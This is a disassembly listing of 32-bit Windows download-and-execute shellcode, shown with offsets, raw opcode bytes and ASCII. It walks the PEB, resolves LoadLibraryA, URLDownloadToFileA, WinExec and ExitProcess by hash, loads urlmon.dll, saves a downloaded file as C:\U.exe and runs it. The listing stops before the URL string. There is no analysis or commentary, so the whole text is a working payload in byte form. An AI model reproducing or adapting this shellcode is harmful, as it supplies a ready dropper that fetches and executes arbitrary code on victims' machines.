0x0        jmp 0x56                            \xeb\x54                  .T        

     label_0x2:
0x2        mov esi, dword ptr [ebp + 0x3c]     \x8b\x75\x3c              .u<       
0x5        mov esi, dword ptr [ebp + esi + 0x78] \x8b\x74\x35\x78          .t5x      
0x9        add esi, ebp                        \x03\xf5                  ..        
0xb        push esi                            \x56                      V         
0xc        mov esi, dword ptr [esi + 0x20]     \x8b\x76\x20              .v        
0xf        add esi, ebp                        \x03\xf5                  ..        
0x11       xor ecx, ecx                        \x33\xc9                  3.        
0x13       dec ecx                             \x49                      I         
     label_0x14:
0x14       inc ecx                             \x41                      A         
0x15       lodsd eax, dword ptr [esi]          \xad                      .         
0x16       xor ebx, ebx                        \x33\xdb                  3.        
     label_0x18:
0x18       movsx edx, byte ptr ss:[eax + ebp]  \x36\x0f\xbe\x14\x28      6...(     
0x1d       cmp dl, dh                          \x38\xf2                  8.        
0x1f       je 0x29                             \x74\x08                  t.        

0x21       ror ebx, 0xd                        \xc1\xcb\x0d              ...       
0x24       add ebx, edx                        \x03\xda                  ..        
0x26       inc eax                             \x40                      @         
0x27       jmp 0x18                            \xeb\xef                  ..        

     label_0x29:
0x29       cmp ebx, edi                        \x3b\xdf                  ;.        
0x2b       jne 0x14                            \x75\xe7                  u.        

0x2d       pop esi                             \x5e                      ^         
0x2e       mov ebx, dword ptr [esi + 0x24]     \x8b\x5e\x24              .^$       
0x31       add ebx, ebp                        \x03\xdd                  ..        
0x33       mov cx, word ptr [ebx + ecx*2]      \x66\x8b\x0c\x4b          f..K      
0x37       mov ebx, dword ptr [esi + 0x1c]     \x8b\x5e\x1c              .^.       
0x3a       add ebx, ebp                        \x03\xdd                  ..        
0x3c       mov eax, dword ptr [ebx + ecx*4]    \x8b\x04\x8b              ...       
0x3f       add eax, ebp                        \x03\xc5                  ..        
0x41       ret                                 \xc3                      .         

0x42       urlmon.dll ; string                \x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c          
0x4c       db 0x00 (!)                        \x00                      .         
0x4d       db 0x43 (!)                        \x43                      C         
0x4e       db 0x3a (!)                        \x3a                      :         
0x4f       db 0x5c (!)                        \x5c                      \         
0x50       db 0x55 (!)                        \x55                      U         
0x51       db 0x2e (!)                        \x2e                      .         
0x52       db 0x65 (!)                        \x65                      e         
0x53       db 0x78 (!)                        \x78                      x         
0x54       db 0x65 (!)                        \x65                      e         
0x55       db 0x00 (!)                        \x00                      .         
     label_0x56:
0x56       xor eax, eax                        \x33\xc0                  3.        
0x58       add eax, dword ptr fs:[eax + 0x30]  \x64\x03\x40\x30          d.@0      
0x5c       js 0x6a                             \x78\x0c                  x.        

0x5e       mov eax, dword ptr [eax + 0xc]      \x8b\x40\x0c              .@.       
0x61       mov esi, dword ptr [eax + 0x1c]     \x8b\x70\x1c              .p.       
0x64       lodsd eax, dword ptr [esi]          \xad                      .         
0x65       mov eax, dword ptr [eax + 8]        \x8b\x40\x08              .@.       
0x68       jmp 0x73                            \xeb\x09                  ..        

     label_0x6a:
0x6a       mov eax, dword ptr [eax + 0x34]     \x8b\x40\x34              .@4       
0x6d       lea eax, [eax + 0x7c]               \x8d\x40\x7c              .@|       
0x70       mov eax, dword ptr [eax + 0x3c]     \x8b\x40\x3c              .@<       
     label_0x73:
0x73       xchg eax, ebp                       \x95                      .         
0x74       mov edi, 0xec0e4e8e                 \xbf\x8e\x4e\x0e\xec      ..N..     
0x79       call 2                              \xe8\x84\xff\xff\xff      .....     
0x7e       sub esp, 4                          \x83\xec\x04              ...       
0x81       sub dword ptr [esp], 0x3c           \x83\x2c\x24\x3c          .,$<      
0x85       call eax                            \xff\xd0                  ..        
0x87       xchg eax, ebp                       \x95                      .         
0x88       push eax                            \x50                      P         
0x89       mov edi, 0x702f1a36                 \xbf\x36\x1a\x2f\x70      .6./p     
0x8e       call 2                              \xe8\x6f\xff\xff\xff      .o...     
0x93       mov edx, dword ptr [esp - 4]        \x8b\x54\x24\xfc          .T$.      
0x97       lea edx, [edx - 0x46]               \x8d\x52\xba              .R.       
0x9a       xor ebx, ebx                        \x33\xdb                  3.        
0x9c       push ebx                            \x53                      S         
0x9d       push ebx                            \x53                      S         
0x9e       push edx                            \x52                      R         
0x9f       jmp 0xc5                            \xeb\x24                  .$        

     label_0xa1:
0xa1       push ebx                            \x53                      S         
0xa2       call eax                            \xff\xd0                  ..        
0xa4       pop ebp                             \x5d                      ]         
0xa5       mov edi, 0xe8afe98                  \xbf\x98\xfe\x8a\x0e      .....     
0xaa       call 2                              \xe8\x53\xff\xff\xff      .S...     
0xaf       sub esp, 4                          \x83\xec\x04              ...       
0xb2       sub dword ptr [esp], 0x62           \x83\x2c\x24\x62          .,$b      
0xb6       call eax                            \xff\xd0                  ..        
0xb8       mov edi, 0x73e2d87e                 \xbf\x7e\xd8\xe2\x73      .~..s     
0xbd       call 2                              \xe8\x40\xff\xff\xff      .@...     
0xc2       push edx                            \x52                      R         
0xc3       call eax                            \xff\xd0                  ..        
     label_0xc5:
0xc5       call 0xa1                           \xe8\xd7\xff\xff\xff      .....     
